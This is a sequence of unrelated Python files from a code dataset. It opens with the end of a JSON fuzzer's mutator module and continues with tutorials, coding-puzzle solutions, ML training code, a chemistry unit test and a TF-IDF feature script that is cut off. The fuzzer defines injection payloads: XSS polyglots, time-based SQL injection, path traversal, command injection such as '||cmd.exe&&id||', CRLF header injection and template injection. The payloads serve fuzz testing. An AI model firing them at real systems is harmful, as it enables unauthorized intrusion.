{\n 0: lambda x: x[::-1],\n 1: lambda x: self.external.execute(self.get_string_polyglot_attack(x)),\n 2: lambda x: \"\",\n 3: lambda x: [x],\n 4: lambda x: False,\n 5: lambda x: {\"param\": self.external.execute(self.get_string_polyglot_attack(x))},\n 6: lambda x: 0,\n }\n\n self.boolean_mutator = {\n 0: lambda x: not x,\n 1: lambda x: str(x),\n 2: lambda x: str(not x),\n 3: lambda x: int(x),\n 4: lambda x: int(not x),\n 5: lambda x: float(x),\n 6: lambda x: float(not x),\n }\n\n self.int_mutator = {\n 0: lambda x: x ^ 0xffffff,\n 1: lambda x: -x,\n 2: lambda x: \"%s\" % x,\n 3: lambda x: x | 0xff,\n 4: lambda x: random.randint(-2147483647, 2147483647),\n 5: lambda x: bool(x),\n 6: lambda x: x | 0xff000000\n }\n\n self.float_mutator = {\n 0: lambda x: float(int(round(x, 0)) ^ 0xffffff),\n 1: lambda x: -x,\n 2: lambda x: \"%s\" % x,\n 3: lambda x: float(int(round(x, 0)) | 0xff),\n 4: lambda x: float(random.randint(-2147483647, 2147483647)*0.1),\n 5: lambda x: bool(round(x, 0)),\n 6: lambda x: float(int(round(x, 0)) | 0xff000000)\n }\n\n self.null_mutator = {\n 0: lambda x: float('nan'),\n 1: lambda x: int(bool(x)),\n 2: lambda x: bool(x),\n 3: lambda x: float('+inf'),\n 4: lambda x: {},\n 5: lambda x: [int(bool(x))],\n 6: lambda x: float('-inf')\n }\n\n self.mutator = {\n str: self.string_mutator,\n bool: self.boolean_mutator,\n int: self.int_mutator,\n float: self.float_mutator,\n type(None): self.null_mutator,\n }\n\n self.polyglot_attacks = {\n 0: \"jaVasCript:/*-/*\\\\u0060/*\\\\\\\\u0060/*'/*\\\"/**/(/* */oNcliCk=alert() )//%%0D%%0A%%0d%%0a//\\\\u003csVg/\\\\u003e\",\n 1: \"SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR\"\n \"(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|\\\"XOR(IF(SUBSTR(@@version,1,1)\"\n \"<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR\\\"*/ FROM some_table WHERE ex = %s\",\n 2: \"/../../../../etc/%s\",\n 3: \"SLEEP(1) /*' or SLEEP(1) or '\\\" or SLEEP(1) or \\\"*/%s\",\n 4: \"\",\n 5: \"%s&sleep 5&id'\\\\\\\"\\\\u00600&sleep 5&id\\\\u0060'\",\n 6: \"..\\\\..\\\\..\\\\..\\\\%s.ini\",\n 7: \"data:text/html,https://%s:a.it@www.\\\\it\",\n 8: \"file:///proc/self/%s\",\n 9: \"\\\\u000d\\\\u00a0BB: %s@mail.it\\\\u000d\\\\u000aLocation: www.google.it\",\n 10: \"||cmd.exe&&id||%s\",\n 11: \"${7*7}a{{%s}}b\",\n 12: \"{{'%s'*7}}\",\n 13: \"\".join(string.printable.strip(\"\\t\\n\\r\\x0b\\x0c\")[random.randint(0, 93)]\n for _ in range(0, random.randint(1, 30))).replace(\"%\", \"\") + \"%s\"\n }\n\n def _get_random(self, obj_type):\n \"\"\"\n Get a random mutator from a list of mutators\n \"\"\"\n return self.mutator[obj_type][random.randint(0, self.level)]\n\n def get_mutator(self, obj, obj_type):\n \"\"\"\n Get a random mutator for the given type\n \"\"\"\n return self._get_random(obj_type)(obj)\n\n def get_string_polyglot_attack(self, obj):\n \"\"\"\n Return a polyglot attack containing the original object\n \"\"\"\n return self.polyglot_attacks[random.choice(self.polyglot_attacks.keys())] % obj\n\n","sub_path":"core/pjf_mutators.py","file_name":"pjf_mutators.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"491261793","text":"__author__ = 'Alternate'\na = [\"Retention\", 3, None] # None is the same thing as null.\nb = [\"Retention\", 3, None]\n\nif a is not b: # yay for intuitive operators. \"is\" can be used for checking null references\n\tprint(\"wut\") # but this actually prints; it's the equivalent of equals().\nelse:\n\tprint(\"derp\")\n\nif a.__eq__(b): # the following two are functionally equivalent for strings.\n\tprint(\"test\")\n\nif a == b:\n\tprint(\"test line 14\")\n\n# however:\n\nb = a\n\nif a == b:\n\tprint(\"test line 21\") # this prints, because they are now referencing the same object.\n\na = 7\n\nif 0 <= a < 7: # actually intuitive shit without bullshit logical and\n\tprint(a)\n\n","sub_path":"src/Tutorials/Section2/Identity Operator.py","file_name":"Identity Operator.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"325105865","text":"N = int(input())\ncnt=1\nwhile True:\n if N>cnt:\n N = N - cnt\n cnt += 1\n else:\n break\nif cnt % 2 == 0:\n print(f'{N}/{cnt - (N - 1)}')\nelse:\n print(f'{cnt - (N - 1)}/{N}')\n\n\n","sub_path":"BaekJoon/1193.py","file_name":"1193.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622846744","text":"# LeetCode 228. Summary Ranges `E`\n# 1sk | 95% | 21'\n# A~1c11\n\nclass Solution:\n def summaryRanges(self, nums: List[int]) -> List[str]:\n ans = []\n i, j = 0, 0\n for j in range(0, len(nums)):\n if j == len(nums)-1 or nums[j+1] - nums[j] > 1:\n if i == j:\n ans.append(str(nums[j]))\n else:\n ans.append(str(nums[i]) + \"->\" + str(nums[j]))\n i = j = j + 1\n return ans\n","sub_path":"LeetCode/02/lc228.py","file_name":"lc228.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"84692915","text":"#\n#\n# file: TrainModeB.py\n# author: Jingquan Lee\n# date: 2019-03-13\n#\n#\n\nimport os\n\nimport numpy as np\nimport cv2\nimport tensorflow as tf\n\nfrom model.DResConvLSTM import DResConvLSTM\n\nfrom train.TrainModeA import TrainModeA\n\nclass TrainModeB(TrainModeA):\n def __init__(self, learning_rate=0.0005, epochs=20, batch_size=10, shape=(48, 64, 16, 16),\n print_every=1, save_every=1, log_path=None, filter_size=(3, 3, 3, 3),\n inputs_channel=(2048, 64), c_h_channel=(1, 1), forget_bias=(1.0, 1.0),\n save_model_path=None, pretrained_model=None, feature_dir=(None, None),\n scanpath=(None, None), idxs=None, num_steps=8, num_validation=None):\n \"\"\"Intialize TrainModeB which is extended from TrainModeA, lr indicates low \n resolution lstm and hr indicates high resolution lstm\n Args(different from TrainModeA):\n -shape: a tuple of 4 ints, (lr rows, lr cols, hr rows, hr cols)\n -filter_size: a tuple of 4 ints, (lr rows, lr cols, hr rows, hr cols) of\n filter size in lr or hr\n -inputs_channel: a tuple of 2 ints, (lr input channels, hr input channels)\n -c_h_channel: a tuple of 2 ints, (lr channels, hr channels)\n -forget_bias: a tuple of 2 ints, (lr forget bias, hr forget bias)\n -init_hidden: a tuple of 2 Tensors, (lr hidden initial tensor,\n hr hidden initial Tensor)\n -scanpath: a tuple of 2 Tensors, (lr gt scanpath, hr gt scanpath)\n \"\"\"\n super().__init__(learning_rate=learning_rate, epochs=epochs, batch_size=batch_size,\n shape=shape, print_every=print_every, save_every=save_every, log_path=log_path,\n filter_size=filter_size, inputs_channel=inputs_channel, c_h_channel=c_h_channel,\n forget_bias=forget_bias, init_hidden=(None, None), save_model_path=save_model_path,\n pretrained_model=pretrained_model, feature_dir=feature_dir, scanpath=scanpath,\n idxs=idxs, num_steps=num_steps, num_validation=num_validation)\n\n def _init_model(self):\n self._preds = DResConvLSTM(filter_size=self._filter_size,\n inputs_channel=self._inputs_channel, shape=self._shape,\n c_h_channel=self._c_h_channel, forget_bias=self._forget_bias,\n num_steps=self._num_steps, batch_size=self._batch_size)\n\n def _init_holder(self):\n self._lr_labels_holder = tf.placeholder(name='lr_labels', shape=(None, self._num_steps, 2), dtype=tf.float32)\n self._hr_labels_holder = tf.placeholder(name='hr_labels', shape=(None, self._num_steps, 2), dtype=tf.float32)\n self._labels_holder=tf.placeholder(name='labels', shape=(2, None, self._num_steps, 2),\n dtype=tf.float32)\n\n def _compute_loss(self):\n preds = self._preds()\n lr_labels = self._lr_labels_holder\n hr_labels = self._hr_labels_holder\n loss = 0.0\n weight = lr_labels > 0\n weight = tf.cast(weight, dtype=tf.float32)\n lr_preds = tf.multiply(preds[0], weight)\n weight = hr_labels > 0\n weight = tf.cast(weight, dtype=tf.float32)\n hr_preds = tf.multiply(preds[1], weight)\n loss += tf.losses.mean_squared_error(lr_labels, lr_preds)\n loss += tf.losses.mean_squared_error(hr_labels, hr_preds)\n return loss\n \n def _decode_predicts(self, predicts):\n lr_preds = predicts[0] \n hr_preds = predicts[1]\n lr_preds[:, :, 0] = lr_preds[:, :, 0] * self._shape[1]\n lr_preds[:, :, 1] = lr_preds[:, :, 1] * self._shape[0]\n hr_preds[:, :, 0] = hr_preds[:, :, 0] * self._shape[3]\n hr_preds[:, :, 1] = hr_preds[:, :, 1] * self._shape[2]\n lr_preds = np.around(lr_preds, 0)\n hr_preds = np.around(hr_preds, 0)\n preds = np.zeros(np.shape(lr_preds))\n preds[:, :, 0] = lr_preds[:, :, 0] * self._shape[3] + hr_preds[:, :, 0]\n preds[:, :, 1] = lr_preds[:, :, 1] * self._shape[2] + hr_preds[:, :, 1]\n preds = preds.astype('int32')\n preds = np.concatenate([preds[:, :, 0], preds[:, :, 1]], axis=1)\n return preds\n \n #def __get_hr_feature_idx(self, coord):\n # \"\"\"Gnerate the idx in hr region feature, for sake of\n # drawing regions of feature as a list.\n # \"\"\"\n # x = np.around(coord[:, 0] * self._shape[1], 0)\n # y = np.around(coord[:, 1] * self._shape[0], 0)\n # idx = y * self._shape[1] + x\n # idx = idx.astype('int32')\n # return idx\n\n def __get_h_init(self, shape, coord, kernel_size):\n \"\"\"Generate initial hidden state by using Gaussian kernel\n blur initial coordination, sigma is -1.\n Args:\n -shape: a tuple of (int, int), shape of hidden state\n -coord: a tuple of (float, float), normalized coordination\n -kernel_size: a int, Gaussian kernel size\n Returns:\n -init: a Tensor, generated initial hidden state\n \"\"\"\n init = np.zeros(shape)\n coord = (np.around(coord[0] * shape[1]), np.around(coord[1] * shape[0]))\n init[int(coord[1])][int(coord[0])] = 1.0\n kernel = cv2.getGaussianKernel(kernel_size, sigma=-1)\n init = cv2.filter2D(init, ddepth = -1, kernel=kernel)\n init = cv2.filter2D(init, ddepth = -1, kernel=kernel.T)\n init = init[:, :, np.newaxis]\n return init\n\n def _generate_feed_dict(self, idxs):\n lr_features = []\n hr_features = []\n for idx in idxs:\n lr_feature = np.load(os.path.join(self._feature_dir[0], str(idx[0])+'.npy'))\n hr_feature = np.load(os.path.join(self._feature_dir[1], str(idx[0])+'.npy'))\n# region_idx = self.__get_hr_feature_idx(self._scanpath[0][idx[0]][idx[1]][0: 8, :])\n lr_features.append(lr_feature[:, :, :])\n hr_features.append(hr_feature[:, :, :, :])\n lr_features = np.array(lr_features)\n hr_features = np.array(hr_features)\n lr_scanpaths = []\n hr_scanpaths = []\n for idx in idxs:\n lr_scanpath = self._scanpath[0][idx[0]][idx[1]][1: 9, 0: 2]\n lr_scanpaths.append(lr_scanpath)\n hr_scanpath = self._scanpath[1][idx[0]][idx[1]][1: 9, 0: 2]\n hr_scanpaths.append(hr_scanpath)\n lr_scanpaths = np.array(lr_scanpaths)\n hr_scanpaths = np.array(hr_scanpaths)\n lr_h_init = []\n hr_h_init = []\n for idx in idxs:\n lr_h_init.append(self.__get_h_init(shape=(self._shape[0], self._shape[1]),\n coord=(self._scanpath[0][idx[0]][idx[1]][0, 0],\n self._scanpath[0][idx[0]][idx[1]][0, 1]),\n kernel_size=15))\n hr_h_init.append(self.__get_h_init(shape=(self._shape[2], self._shape[3]),\n coord=(self._scanpath[1][idx[0]][idx[1]][0, 0],\n self._scanpath[1][idx[0]][idx[1]][0, 1]),\n kernel_size=7))\n lr_h_init = np.array(lr_h_init)\n hr_h_init = np.array(hr_h_init)\n lr_c_init = np.zeros((np.shape(idxs)[0], self._shape[0], self._shape[1], self._c_h_channel[0]))\n hr_c_init = np.zeros((np.shape(idxs)[0], self._shape[2], self._shape[3], self._c_h_channel[2]))\n feed_dict = {self._lr_labels_holder: lr_scanpaths, self._hr_labels_holder: hr_scanpaths,\n self._preds.lr_h_init: lr_h_init, self._preds.hr_h_init: hr_h_init,\n self._preds.lr_c_init: lr_c_init, self._preds.hr_c_init: hr_c_init,\n self._preds.lr_inputs: lr_features, self._preds.hr_inputs: hr_features,\n self._labels_holder: [lr_scanpaths, hr_scanpaths]}\n return feed_dict\n","sub_path":"train/TrainModeB.py","file_name":"TrainModeB.py","file_ext":"py","file_size_in_byte":7723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"229215276","text":"\"\"\"\nUnit tests for NCMC switching engine.\n\n\"\"\"\n\n__author__ = 'John D. Chodera'\n\n################################################################################\n# IMPORTS\n################################################################################\n\nfrom simtk import openmm, unit\nimport math\nimport numpy as np\nfrom functools import partial\n\n################################################################################\n# CONSTANTS\n################################################################################\n\nkB = unit.BOLTZMANN_CONSTANT_kB * unit.AVOGADRO_CONSTANT_NA\n\n################################################################################\n# TESTS\n################################################################################\n\ndef simulate(system, positions, nsteps=500, timestep=1.0*unit.femtoseconds, temperature=300.0*unit.kelvin, collision_rate=20.0/unit.picoseconds):\n integrator = openmm.LangevinIntegrator(temperature, collision_rate, timestep)\n context = openmm.Context(system, integrator)\n context.setPositions(positions)\n context.setVelocitiesToTemperature(temperature)\n integrator.step(nsteps)\n positions = context.getState(getPositions=True).getPositions(asNumpy=True)\n return positions\n\ndef check_alchemical_elimination(ncmc_nsteps=50):\n \"\"\"\n Test alchemical elimination engine on alanine dipeptide null transformation.\n\n \"\"\"\n\n NSIGMA_MAX = 6.0 # number of standard errors away from analytical solution tolerated before Exception is thrown\n\n # Create an alanine dipeptide null transformation, where N-methyl group is deleted and then inserted.\n from openmmtools import testsystems\n testsystem = testsystems.AlanineDipeptideVacuum()\n from perses.rjmc.topology_proposal import TopologyProposal\n new_to_old_atom_map = { index : index for index in range(testsystem.system.getNumParticles()) if (index > 3) } # all atoms but N-methyl\n topology_proposal = TopologyProposal(old_system=testsystem.system, old_topology=testsystem.topology, old_positions=testsystem.positions, new_system=testsystem.system, new_topology=testsystem.topology, logp_proposal=0.0, new_to_old_atom_map=new_to_old_atom_map, metadata=dict())\n\n # Initialize engine\n from perses.annihilation.ncmc_switching import NCMCEngine\n ncmc_engine = NCMCEngine(nsteps=ncmc_nsteps)\n\n niterations = 20 # number of round-trip switching trials\n positions = testsystem.positions\n logP_insert_n = np.zeros([niterations], np.float64)\n logP_delete_n = np.zeros([niterations], np.float64)\n for iteration in range(niterations):\n # Equilibrate\n positions = simulate(testsystem.system, positions)\n\n # Delete atoms\n [positions, logP_delete] = ncmc_engine.integrate(topology_proposal, positions, direction='delete')\n\n # Insert atoms\n [positions, logP_insert] = ncmc_engine.integrate(topology_proposal, positions, direction='insert')\n\n # Compute total probability\n logP_delete_n[iteration] = logP_delete\n logP_insert_n[iteration] = logP_insert\n\n\n # Check free energy difference is withing NSIGMA_MAX standard errors of zero.\n logP_n = logP_delete_n + logP_insert_n\n from pymbar import EXP\n [df, ddf] = EXP(logP_n)\n if (abs(df) > NSIGMA_MAX * ddf):\n msg = 'Delta F (%d steps switching) = %f +- %f kT; should be within %f sigma of 0' % (ncmc_nsteps, df, ddf, NSIGMA_MAX)\n msg += 'delete logP:\\n'\n msg += str(logP_delete_n) + '\\n'\n msg += 'insert logP:\\n'\n msg += str(logP_insert_n) + '\\n'\n msg += 'logP:\\n'\n msg += str(logP_n) + '\\n'\n raise Exception(msg)\n\ndef test_alchemical_elimination():\n \"\"\"\n Check alchemical elimination for alanine dipeptide in vacuum with 0, 1, and 50 switching steps.\n\n \"\"\"\n for ncmc_nsteps in [0, 1, 50]:\n f = partial(check_alchemical_elimination, ncmc_nsteps)\n f.description = \"Testing alchemical elimination using alanine dipeptide with %d NCMC steps\" % ncmc_nsteps\n yield f\n","sub_path":"perses/tests/test_elimination.py","file_name":"test_elimination.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"370982095","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 17 17:37:38 2016\n\n@author: tofu\n\"\"\"\nname = \"ana\"\nx = 23\ny = 4.5323232\na = x / y\n\nprint(name)\nprint(a)\n\napples = 5\noranges = 10\nfruits = apples + oranges\nprint(\"Amount of fruits available:\", fruits)\napples = 20\nfruits = apples + oranges\nprint(\"Amount of fruits now available:\", fruits)\n\nsix = 2 + 2 + 2\nprint(six)\nneg = six * -6\nprint(neg)\nneg /=10\nprint(neg)\n\nhalf = 0.25 * 2\nprint(\"First half:\",half)\nother_half = 1.0 - half\nprint(\"Now the other half:\",other_half)\n\ncold = True\nrain = False\nday = cold and rain\n\none = \"one\"\nanother_one = \"1.0\"\nlast_one = \"1 one\"\n\ntest = None\nprint(type(test))\n\nint(True)\n\n\nminutes_to_convert = 324\nhours_decimal = minutes_to_convert/60\nhours_part = int(hours_decimal)\nminutes_part = minutes_to_convert%60\nprint(\"Hours\")\nprint(hours_part)\nprint(\"Minutes\")\nprint(minutes_part)","sub_path":"code_exercises/basic_exercises.py","file_name":"basic_exercises.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"651690826","text":"# Imports\nimport pandas as pd\nimport numpy as np\nfrom statistics import mean, stdev\nfrom math import sqrt\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport re\nfrom scipy.sparse import csr_matrix\n\n# Suppress warnings \nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# Import data\ndataframe = pd.read_csv('dataframe_NLP.csv', header=0, sep=\",\", encoding=\"ISO-8859-1\")\ndataframe[\"product_words\"] = dataframe[\"product_words\"].apply(lambda x: eval(x))\ndataframe[\"research_words\"] = dataframe[\"research_words\"].apply(lambda x: eval(x))\ndataframe[\"brand_words\"] = dataframe[\"brand_words\"].apply(lambda x: eval(x))\ndataframe[\"product_description_words\"] = dataframe[\"product_description_words\"].apply(lambda x: eval(x))\ndataframe[\"list_attributes_words\"] = dataframe[\"list_attributes_words\"].apply(lambda x: eval(x))\ndataframe[\"corrected_research_words\"] = dataframe[\"corrected_research_words\"].apply(lambda x: eval(x))\n\n# Create corpus from dataframe\ncorpus = list(dataframe[\"product_words\"])\npiv_corpus = len(corpus)\ncorpus += list(dataframe[\"product_description_words\"])\ncorpus += list(dataframe[\"list_attributes_words\"])\ncorpus += list(dataframe[\"brand_words\"])\ncorpus += list(dataframe[\"corrected_research_words\"])\n\ndef remove_figures(vec):\n new_vec = []\n for elt in vec:\n if re.sub(r\"([0-9]+)\", \"f\", elt) != \"f\":\n new_vec.append(elt)\n return new_vec\n\ncorpus = list(map(remove_figures, corpus))\n\ndef join_list(lt):\n return \" \".join(lt)\n\ncorpus = list(map(join_list, corpus))\n\n# TF-IDF\nvec = TfidfVectorizer()\nvec1 = vec.fit_transform(corpus)\n\n# Attribution aux variables\ntitle = vec1[0:piv_corpus]\ndescription = vec1[piv_corpus:2*piv_corpus]\nattributes = vec1[2*piv_corpus:3*piv_corpus]\nbrand = vec1[3*piv_corpus:4*piv_corpus]\nsearch = vec1[4*piv_corpus:5*piv_corpus]\n\n# Nouvelles features\nproduit_vec1 = []\nproduit_vec2 = []\nproduit_vec3 = []\nproduit_vec4 = []\n\ncar1_title = [] # min diff de 0\ncar2_title = [] # max\ncar3_title = [] # mean without 0\ncar4_title = [] # nbre diff de 0\ncar5_title = [] # somme\n\ncar1_description = [] # min diff de 0\ncar2_description = [] # max\ncar3_description = [] # mean without 0\ncar4_description = [] # nbre diff de 0\ncar5_description = [] # somme\n\ncar1_attributes = [] # min diff de 0\ncar2_attributes = [] # max\ncar3_attributes = [] # mean without 0\ncar4_attributes = [] # nbre diff de 0\ncar5_attributes = [] # somme\n\ncar1_brand = [] # min diff de 0\ncar2_brand = [] # max\ncar3_brand = [] # mean without 0\ncar4_brand = [] # nbre diff de 0\ncar5_brand = [] # somme\n\ncar1_search = [] # min diff de 0\ncar2_search = [] # max\ncar3_search = [] # mean without 0\ncar4_search = [] # nbre diff de 0\ncar5_search = [] # somme\n\nfor i in range(piv_corpus):\n elt = list(title[i].nonzero()[1])\n elt = title[i].toarray()[0][elt]\n if elt != []:\n car1_title.append(min(elt)) # min diff de 0\n car2_title.append(max(elt)) # max\n car3_title.append(mean(elt)) # mean without 0\n car4_title.append(len(elt)) # nbre diff de 0\n car5_title.append(sum(elt)) # somme\n else:\n car1_title.append(0) # min diff de 0\n car2_title.append(0) # max\n car3_title.append(0) # mean without 0\n car4_title.append(0) # nbre diff de 0\n car5_title.append(0) # somme\n #\n elt = list(description[i].nonzero()[1])\n elt = description[i].toarray()[0][elt]\n if elt != []:\n car1_description.append(min(elt)) # min diff de 0\n car2_description.append(max(elt)) # max\n car3_description.append(mean(elt)) # mean without 0\n car4_description.append(len(elt)) # nbre diff de 0\n car5_description.append(sum(elt)) # somme\n else:\n car1_description.append(0) # min diff de 0\n car2_description.append(0) # max\n car3_description.append(0) # mean without 0\n car4_description.append(0) # nbre diff de 0\n car5_description.append(0) # somme \n #\n elt = list(attributes[i].nonzero()[1])\n elt = attributes[i].toarray()[0][elt]\n if elt != []:\n car1_attributes.append(min(elt)) # min diff de 0\n car2_attributes.append(max(elt)) # max\n car3_attributes.append(mean(elt)) # mean without 0\n car4_attributes.append(len(elt)) # nbre diff de 0\n car5_attributes.append(sum(elt)) # somme\n else:\n car1_attributes.append(0) # min diff de 0\n car2_attributes.append(0) # max\n car3_attributes.append(0) # mean without 0\n car4_attributes.append(0) # nbre diff de 0\n car5_attributes.append(0) # somme\n #\n elt = list(brand[i].nonzero()[1])\n elt = brand[i].toarray()[0][elt]\n if elt != []:\n car1_brand.append(min(elt)) # min diff de 0\n car2_brand.append(max(elt)) # max\n car3_brand.append(mean(elt)) # mean without 0\n car4_brand.append(len(elt)) # nbre diff de 0\n car5_brand.append(sum(elt)) # somme\n else:\n car1_brand.append(0) # min diff de 0\n car2_brand.append(0) # max\n car3_brand.append(0) # mean without 0\n car4_brand.append(0) # nbre diff de 0\n car5_brand.append(0) # somme\n #\n elt = list(search[i].nonzero()[1])\n elt = search[i].toarray()[0][elt]\n if elt != []:\n car1_search.append(min(elt)) # min diff de 0\n car2_search.append(max(elt)) # max\n car3_search.append(mean(elt)) # mean without 0\n car4_search.append(len(elt)) # nbre diff de 0\n car5_search.append(sum(elt)) # somme\n else:\n car1_search.append(0) # min diff de 0\n car2_search.append(0) # max\n car3_search.append(0) # mean without 0\n car4_search.append(0) # nbre diff de 0\n car5_search.append(0) # somme\n #\n produit_vec1.append(np.vdot(title[i].toarray()[0], search[i].toarray()[0]))\n produit_vec2.append(np.vdot(description[i].toarray()[0], search[i].toarray()[0]))\n produit_vec3.append(np.vdot(attributes[i].toarray()[0], search[i].toarray()[0]))\n produit_vec4.append(np.vdot(brand[i].toarray()[0], search[i].toarray()[0]))\n\n# Avec .idf_\n# Vect with 1 and 0\n# Every non nul values set to 1\nkeep = vec1.nonzero()\nn_keep = len(keep[0])\n\nrelu_vec1 = csr_matrix((np.ones(n_keep), (keep[0], keep[1])), shape=vec1.shape)\nrelu_title = relu_vec1[0:piv_corpus]\nrelu_description = relu_vec1[piv_corpus:2*piv_corpus]\nrelu_attributes = relu_vec1[2*piv_corpus:3*piv_corpus]\nrelu_brand = relu_vec1[3*piv_corpus:4*piv_corpus]\nrelu_search = relu_vec1[4*piv_corpus:5*piv_corpus]\n\n# More features with .idf_\nvec = vec.idf_\n\nproduit_vec5 = []\nproduit_vec6 = []\nproduit_vec7 = []\nproduit_vec8 = []\n\nproduit_vec9 = []\nproduit_vec10 = []\nproduit_vec11 = []\nproduit_vec12 = []\n\ncar1_rv_search = [] # min diff de 0\ncar2_rv_search = [] # max\ncar3_rv_search = [] # mean without 0\ncar4_rv_search = [] # nbre diff de 0\ncar5_rv_search = [] # somme\n\ncar1_rv_title = [] # min diff de 0\ncar2_rv_title = [] # max\ncar3_rv_title = [] # mean without 0\ncar4_rv_title = [] # nbre diff de 0\ncar5_rv_title = [] # somme\n\ncar1_rv_description = [] # min diff de 0\ncar2_rv_description = [] # max\ncar3_rv_description = [] # mean without 0\ncar4_rv_description = [] # nbre diff de 0\ncar5_rv_description = [] # somme\n\ncar1_rv_attributes = [] # min diff de 0\ncar2_rv_attributes = [] # max\ncar3_rv_attributes = [] # mean without 0\ncar4_rv_attributes = [] # nbre diff de 0\ncar5_rv_attributes = [] # somme\n\ncar1_rv_brand = [] # min diff de 0\ncar2_rv_brand = [] # max\ncar3_rv_brand = [] # mean without 0\ncar4_rv_brand = [] # nbre diff de 0\ncar5_rv_brand = [] # somme\n\nfor i in range(piv_corpus):\n r_title = relu_title[i].toarray()[0]\n r_description = relu_description[i].toarray()[0]\n r_attributes = relu_attributes[i].toarray()[0]\n r_brand = relu_brand[i].toarray()[0]\n r_search = relu_search[i].toarray()[0]\n produit_vec5.append(np.vdot(r_title, r_search))\n produit_vec6.append(np.vdot(r_description, r_search))\n produit_vec7.append(np.vdot(r_attributes, r_search))\n produit_vec8.append(np.vdot(r_brand, r_search))\n #\n r_search = relu_search[i].toarray()[0]\n #\n a = relu_search[i].toarray()[0]*vec\n elt = list(a.nonzero()[0])\n elt = a[elt]\n if elt != []:\n car1_rv_search.append(min(elt)) # min diff de 0\n car2_rv_search.append(max(elt)) # max\n car3_rv_search.append(mean(elt)) # mean without 0\n car4_rv_search.append(len(elt)) # nbre diff de 0\n car5_rv_search.append(sum(elt)) # somme\n else:\n car1_rv_search.append(0) # min diff de 0\n car2_rv_search.append(0) # max\n car3_rv_search.append(0) # mean without 0\n car4_rv_search.append(0) # nbre diff de 0\n car5_rv_search.append(0) # somme\n #\n a = relu_title[i].toarray()[0]*vec\n elt = list(a.nonzero()[0])\n elt = a[elt]\n if elt != []:\n car1_rv_title.append(min(elt)) # min diff de 0\n car2_rv_title.append(max(elt)) # max\n car3_rv_title.append(mean(elt)) # mean without 0\n car4_rv_title.append(len(elt)) # nbre diff de 0\n car5_rv_title.append(sum(elt)) # somme\n else:\n car1_rv_title.append(0) # min diff de 0\n car2_rv_title.append(0) # max\n car3_rv_title.append(0) # mean without 0\n car4_rv_title.append(0) # nbre diff de 0\n car5_rv_title.append(0) # somme\n produit_vec9.append(np.vdot(a, r_search))\n #\n a = relu_description[i].toarray()[0]*vec\n elt = list(a.nonzero()[0])\n elt = a[elt]\n if elt != []:\n car1_rv_description.append(min(elt)) # min diff de 0\n car2_rv_description.append(max(elt)) # max\n car3_rv_description.append(mean(elt)) # mean without 0\n car4_rv_description.append(len(elt)) # nbre diff de 0\n car5_rv_description.append(sum(elt)) # somme\n else:\n car1_rv_description.append(0) # min diff de 0\n car2_rv_description.append(0) # max\n car3_rv_description.append(0) # mean without 0\n car4_rv_description.append(0) # nbre diff de 0\n car5_rv_description.append(0) # somme\n produit_vec10.append(np.vdot(a, r_search))\n #\n a = relu_attributes[i].toarray()[0]*vec\n elt = list(a.nonzero()[0])\n elt = a[elt]\n if elt != []:\n car1_rv_attributes.append(min(elt)) # min diff de 0\n car2_rv_attributes.append(max(elt)) # max\n car3_rv_attributes.append(mean(elt)) # mean without 0\n car4_rv_attributes.append(len(elt)) # nbre diff de 0\n car5_rv_attributes.append(sum(elt)) # somme\n else:\n car1_rv_attributes.append(0) # min diff de 0\n car2_rv_attributes.append(0) # max\n car3_rv_attributes.append(0) # mean without 0\n car4_rv_attributes.append(0) # nbre diff de 0\n car5_rv_attributes.append(0) # somme\n produit_vec11.append(np.vdot(a, r_search))\n #\n a = relu_brand[i].toarray()[0]*vec\n elt = list(a.nonzero()[0])\n elt = a[elt]\n if elt != []:\n car1_rv_brand.append(min(elt)) # min diff de 0\n car2_rv_brand.append(max(elt)) # max\n car3_rv_brand.append(mean(elt)) # mean without 0\n car4_rv_brand.append(len(elt)) # nbre diff de 0\n car5_rv_brand.append(sum(elt)) # somme\n else:\n car1_rv_brand.append(0) # min diff de 0\n car2_rv_brand.append(0) # max\n car3_rv_brand.append(0) # mean without 0\n car4_rv_brand.append(0) # nbre diff de 0\n car5_rv_brand.append(0) # somme\n produit_vec12.append(np.vdot(a, r_search))\n\n# New dataframe with features\ndf_model = pd.DataFrame({\"id\":dataframe.id, \"f1\":produit_vec1})\ndf_model[\"f2\"] = produit_vec2\ndf_model[\"f3\"] = produit_vec3\ndf_model[\"f4\"] = produit_vec4\ndf_model[\"f5\"] = produit_vec5\ndf_model[\"f6\"] = produit_vec6\ndf_model[\"f7\"] = produit_vec7\ndf_model[\"f8\"] = produit_vec8\ndf_model[\"f9\"] = produit_vec9\ndf_model[\"f10\"] = produit_vec10\ndf_model[\"f11\"] = produit_vec11\ndf_model[\"f12\"] = produit_vec12\ndf_model[\"car1_title\"] = car1_title\ndf_model[\"car2_title\"] = car2_title\ndf_model[\"car3_title\"] = car3_title\ndf_model[\"car4_title\"] = car4_title\ndf_model[\"car5_title\"] = car5_title\ndf_model[\"car1_description\"] = car1_description\ndf_model[\"car2_description\"] = car2_description\ndf_model[\"car3_description\"] = car3_description\ndf_model[\"car4_description\"] = car4_description\ndf_model[\"car5_description\"] = car5_description\ndf_model[\"car1_attributes\"] = 